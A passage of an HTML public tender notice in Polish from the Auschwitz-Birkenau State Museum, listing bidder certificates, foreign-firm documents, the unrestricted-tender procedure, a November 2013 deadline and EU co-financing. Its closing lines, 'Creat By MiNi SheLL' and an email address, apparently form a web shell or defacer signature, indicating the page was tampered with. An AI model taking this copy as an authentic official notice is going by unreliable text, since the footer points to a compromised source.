<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a. Formularz ofertowy - Załącznik nr 1 do SIWZ. b. Oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone wg wzoru stanowiącego Załącznik nr 2 do SIWZ. c. Kopia dowodu wniesienia wadium. Oryginał wadium wnoszonego w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej (z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym), w gwarancjach bankowych, w gwarancjach ubezpieczeniowych lub w poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dn. 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.) - należy dołączyć w osobnej, odpowiednio oznaczonej kopercie. d. Pełnomocnictwo (o ile w imieniu wykonawcy działa pełnomocnik)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.auschwitz.org<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PAŃSTWOWE MUZEUM AUSCHWITZ-BIRKENAU w Oświęcimiu ul. Więźniów Oświęcimia 20, 32- 603 OŚWIĘCIM.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.11.2013 godzina 12:00, miejsce: PAŃSTWOWE MUZEUM AUSCHWITZ-BIRKENAU w Oświęcimiu ul. Więźniów Oświęcimia 20, 32- 603 OŚWIĘCIM, budynek administracyjny, biuro podawcze - parter, pokój nr 1.8..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane z grantu bezpośredniego Komisji Europejskiej w ramach projektu pn.: Auschwitz- Zachowanie Autentyzmu, dziewięć zadań na lata 2012 -2015.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com